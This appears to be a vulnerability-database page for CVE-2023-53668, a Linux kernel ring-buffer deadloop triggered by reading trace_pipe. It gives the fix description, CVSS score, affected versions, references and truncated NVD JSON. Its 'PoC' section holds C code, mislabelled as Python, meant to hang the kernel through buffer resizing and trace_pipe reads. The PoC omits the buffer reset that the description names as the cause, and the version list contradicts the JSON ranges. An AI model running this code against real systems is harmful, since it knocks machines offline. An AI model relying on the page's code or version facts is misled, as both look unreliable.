CVE-2023-53668

Description

In the Linux kernel, the following vulnerability has been resolved: ring-buffer: Fix deadloop issue on reading trace_pipe Soft lockup occurs when reading file 'trace_pipe': watchdog: BUG: soft lockup - CPU#6 stuck for 22s! [cat:4488] [...] RIP: 0010:ring_buffer_empty_cpu+0xed/0x170 RSP: 0018:ffff88810dd6fc48 EFLAGS: 00000246 RAX: 0000000000000000 RBX: 0000000000000246 RCX: ffffffff93d1aaeb RDX: ffff88810a280040 RSI: 0000000000000008 RDI: ffff88811164b218 RBP: ffff88811164b218 R08: 0000000000000000 R09: ffff88815156600f R10: ffffed102a2acc01 R11: 0000000000000001 R12: 0000000051651901 R13: 0000000000000000 R14: ffff888115e49500 R15: 0000000000000000 [...] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f8d853c2000 CR3: 000000010dcd8000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: __find_next_entry+0x1a8/0x4b0 ? peek_next_entry+0x250/0x250 ? down_write+0xa5/0x120 ? down_write_killable+0x130/0x130 trace_find_next_entry_inc+0x3b/0x1d0 tracing_read_pipe+0x423/0xae0 ? tracing_splice_read_pipe+0xcb0/0xcb0 vfs_read+0x16b/0x490 ksys_read+0x105/0x210 ? __ia32_sys_pwrite64+0x200/0x200 ? switch_fpu_return+0x108/0x220 do_syscall_64+0x33/0x40 entry_SYSCALL_64_after_hwframe+0x61/0xc6 Through the vmcore, I found it's because in tracing_read_pipe(), ring_buffer_empty_cpu() found some buffer is not empty but then it cannot read anything due to "rb_num_of_entries() == 0" always true, Then it infinitely loop the procedure due to user buffer not been filled, see following code path: tracing_read_pipe() { ... ... waitagain: tracing_wait_pipe() // 1. find non-empty buffer here trace_find_next_entry_inc() // 2. loop here try to find an entry __find_next_entry() ring_buffer_empty_cpu(); // 3. find non-empty buffer peek_next_entry() // 4. but peek always return NULL ring_buffer_peek() rb_buffer_peek() rb_get_reader_page() // 5. because rb_num_of_entries() == 0 always true here // then return NULL // 6. user buffer not been filled so goto 'waitgain' // and eventually leads to an deadloop in kernel!!! } By some analyzing, I found that when resetting ringbuffer, the 'entries' of its pages are not all cleared (see rb_reset_cpu()). Then when reducing the ringbuffer, and if some reduced pages exist dirty 'entries' data, they will be added into 'cpu_buffer->overrun' (see rb_remove_pages()), which cause wrong 'overrun' count and eventually cause the deadloop issue. To fix it, we need to clear every pages in rb_reset_cpu().

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 4.14.328

Linux Kernel 4.15.x - 4.19.x（受影响）

Linux Kernel 4.20.x - 5.4.x（受影响）

Linux Kernel 5.5.x - 5.10.x（受影响）

Linux Kernel 5.11.x - 5.15.x（受影响）

Linux Kernel 5.16.x - 6.1.x（受影响）

Linux Kernel 6.2.x - 6.5.x（受影响）

Linux Kernel 6.6.x 早期版本（受影响）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/* CVE-2023-53668 - Linux Kernel ring-buffer trace_pipe Deadloop PoC
 * This PoC triggers the soft lockup by continuously reading trace_pipe
 * which causes an infinite loop in the kernel.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>
#include <signal.h>
#include <errno.h>

#define TRACING_DIR "/sys/kernel/debug/tracing"
#define TRACE_PIPE TRACING_DIR "/trace_pipe"
#define BUFFER_SIZE_KB "4096"  /* Increase buffer size to 4MB */

static volatile int keep_running = 1;

void handle_signal(int sig) {
    keep_running = 0;
    printf("\n[!] Received signal %d, stopping...\n", sig);
}

/* Step 1: Configure the trace buffer */
int configure_buffer(void) {
    char path[256];
    char buf[64];
    int fd;

    /* Set buffer size to trigger page reduction scenario */
    snprintf(path, sizeof(path), "%s/buffer_size_kb", TRACING_DIR);
    fd = open(path, O_WRONLY);
    if (fd < 0) {
        if (errno == EACCES) {
            fprintf(stderr, "[-] Need root or tracing privileges\n");
            return -1;
        }
        perror("open buffer_size_kb");
        return -1;
    }

    /* First increase buffer to allocate many pages */
    if (write(fd, BUFFER_SIZE_KB, strlen(BUFFER_SIZE_KB)) < 0) {
        perror("write buffer_size_kb");
        close(fd);
        return -1;
    }
    close(fd);

    /* Then reduce buffer to trigger rb_remove_pages() with dirty entries */
    fd = open(path, O_WRONLY);
    if (fd >= 0) {
        if (write(fd, "1", 1) < 0) {
            perror("write buffer_size_kb reduce");
        }
        close(fd);
    }

    return 0;
}

/* Step 2: Enable a tracer to generate ring buffer activity */
int enable_tracer(void) {
    int fd;
    char path[256];

    /* Enable function tracer to fill ring buffer */
    snprintf(path, sizeof(path), "%s/current_tracer", TRACING_DIR);
    fd = open(path, O_WRONLY);
    if (fd < 0) {
        perror("open current_tracer");
        return -1;
    }
    if (write(fd, "function", 8) < 0) {
        perror("write current_tracer");
        close(fd);
        return -1;
    }
    close(fd);

    /* Enable tracing */
    snprintf(path, sizeof(path), "%s/tracing_on", TRACING_DIR);
    fd = open(path, O_WRONLY);
    if (fd >= 0) {
        if (write(fd, "1", 1) < 0) {
            perror("write tracing_on");
        }
        close(fd);
    }

    return 0;
}

/* Step 3: Read trace_pipe to trigger the deadloop */
void trigger_deadloop(void) {
    int fd;
    char buf[4096];
    ssize_t n;
    int count = 0;

    printf("[*] Opening trace_pipe to trigger deadloop...\n");

    fd = open(TRACE_PIPE, O_RDONLY);
    if (fd < 0) {
        perror("open trace_pipe");
        return;
    }

    /* Continuously read trace_pipe - this will hang in kernel deadloop */
    while (keep_running && count < 100) {
        n = read(fd, buf, sizeof(buf));
        if (n < 0) {
            if (errno == EINTR) continue;
            perror("read trace_pipe");
            break;
        }
        count++;
        printf("[+] Read iteration %d, bytes=%zd\n", count, n);
    }

    close(fd);
}

int main(int argc, char *argv[]) {
    printf("========================================\n");
    printf("CVE-2023-53668 PoC\n");
    printf("Linux Kernel ring-buffer trace_pipe Deadloop\n");
    printf("========================================\n\n");

    signal(SIGINT, handle_signal);
    signal(SIGTERM, handle_signal);

    /* Check if tracing is available */
    if (access(TRACING_DIR, F_OK) != 0) {
        fprintf(stderr, "[-] tracing filesystem not available\n");
        fprintf(stderr, "    Try: mount -t debugfs debugfs /sys/kernel/debug\n");
        return 1;
    }

    /* Configure buffer to trigger the vulnerability condition */
    printf("[*] Step 1: Configuring ring buffer...\n");
    if (configure_buffer() < 0) {
        fprintf(stderr, "[-] Failed to configure buffer\n");
        return 1;
    }

    /* Enable tracer to generate buffer activity */
    printf("[*] Step 2: Enabling tracer...\n");
    if (enable_tracer() < 0) {
        fprintf(stderr, "[-] Failed to enable tracer\n");
        return 1;
    }

    /* Trigger the deadloop */
    printf("[*] Step 3: Reading trace_pipe (will trigger deadloop)...\n");
    printf("[*] Watch for soft lockup message in dmesg:\n");
    printf("    'watchdog: BUG: soft lockup - CPU#X stuck for 22s!'\n\n");

    trigger_deadloop();

    printf("\n[*] Done. Check dmesg for soft lockup messages.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53668
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53668
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53668/
[4] VulDB https://vuldb.com/cve/CVE-2023-53668
[5] https://git.kernel.org/stable/c/0a29dae5786d263016a9aceb1e56bf3fd4cc6fa0
[6] https://git.kernel.org/stable/c/27bdd93e44cc28dd9b94893fae146b83d4f5b31e
[7] https://git.kernel.org/stable/c/5e68f1f3a20fe9b6bde018e353269fbfa289609c
[8] https://git.kernel.org/stable/c/7e42907f3a7b4ce3a2d1757f6d78336984daf8f5
[9] https://git.kernel.org/stable/c/8b0b63fdac6b70a45614e7d4b30e5bbb93deb007
[10] https://git.kernel.org/stable/c/a55e8a3596048c2f7b574049aeb1885b5abba1cc
[11] https://git.kernel.org/stable/c/bb14a93bccc92766b1d9302c6bcbea17d4bce306
[12] https://git.kernel.org/stable/c/e84829522fc72bb43556b31575731de0440ac0dd

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53668", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:50.640", "lastModified": "2026-02-26T23:14:30.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nring-buffer: Fix deadloop issue on reading trace_pipe\n\nSoft lockup occurs when reading file 'trace_pipe':\n\n watchdog: BUG: soft lockup - CPU#6 stuck for 22s! [cat:4488]\n [...]\n RIP: 0010:ring_buffer_empty_cpu+0xed/0x170\n RSP: 0018:ffff88810dd6fc48 EFLAGS: 00000246\n RAX: 0000000000000000 RBX: 0000000000000246 RCX: ffffffff93d1aaeb\n RDX: ffff88810a280040 RSI: 0000000000000008 RDI: ffff88811164b218\n RBP: ffff88811164b218 R08: 0000000000000000 R09: ffff88815156600f\n R10: ffffed102a2acc01 R11: 0000000000000001 R12: 0000000051651901\n R13: 0000000000000000 R14: ffff888115e49500 R15: 0000000000000000\n [...]\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f8d853c2000 CR3: 000000010dcd8000 CR4: 00000000000006e0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n __find_next_entry+0x1a8/0x4b0\n ? peek_next_entry+0x250/0x250\n ? down_write+0xa5/0x120\n ? down_write_killable+0x130/0x130\n trace_find_next_entry_inc+0x3b/0x1d0\n tracing_read_pipe+0x423/0xae0\n ? tracing_splice_read_pipe+0xcb0/0xcb0\n vfs_read+0x16b/0x490\n ksys_read+0x105/0x210\n ? __ia32_sys_pwrite64+0x200/0x200\n ? switch_fpu_return+0x108/0x220\n do_syscall_64+0x33/0x40\n entry_SYSCALL_64_after_hwframe+0x61/0xc6\n\nThrough the vmcore, I found it's because in tracing_read_pipe(),\nring_buffer_empty_cpu() found some buffer is not empty but then it\ncannot read anything due to \"rb_num_of_entries() == 0\" always true,\nThen it infinitely loop the procedure due to user buffer not been\nfilled, see following code path:\n\n tracing_read_pipe() {\n ... ...\n waitagain:\n tracing_wait_pipe() // 1. find non-empty buffer here\n trace_find_next_entry_inc() // 2. loop here try to find an entry\n __find_next_entry()\n ring_buffer_empty_cpu(); // 3. find non-empty buffer\n peek_next_entry() // 4. but peek always return NULL\n ring_buffer_peek()\n rb_buffer_peek()\n rb_get_reader_page()\n // 5. because rb_num_of_entries() == 0 always true here\n // then return NULL\n // 6. user buffer not been filled so goto 'waitgain'\n // and eventually leads to an deadloop in kernel!!!\n }\n\nBy some analyzing, I found that when resetting ringbuffer, the 'entries'\nof its pages are not all cleared (see rb_reset_cpu()). Then when reducing\nthe ringbuffer, and if some reduced pages exist dirty 'entries' data, they\nwill be added into 'cpu_buffer->overrun' (see rb_remove_pages()), which\ncause wrong 'overrun' count and eventually cause the deadloop issue.\n\nTo fix it, we need to clear every pages in rb_reset_cpu()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6", "versionEndExcluding": "4.14.322", "matchCriteriaId": "B2908A09-767F-4F8F-814F-257B8287CFDF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.291", "matchCriteriaId": "D2D2CA9F-4CC4-4AF5-8C6D-E58415AB782E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.251", "matchCriteriaId": "7FA663C4-CA72-4B5A-8592-7354D978F58E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.188", "matchCriteriaId": "43CAE50A-4A6C-488E-813C-F8DB77C13C8B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.121", "matchCriteriaId": "EC77775B-EC31-4966-966C-1286C02B2A85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.40", "matchCri ... (truncated)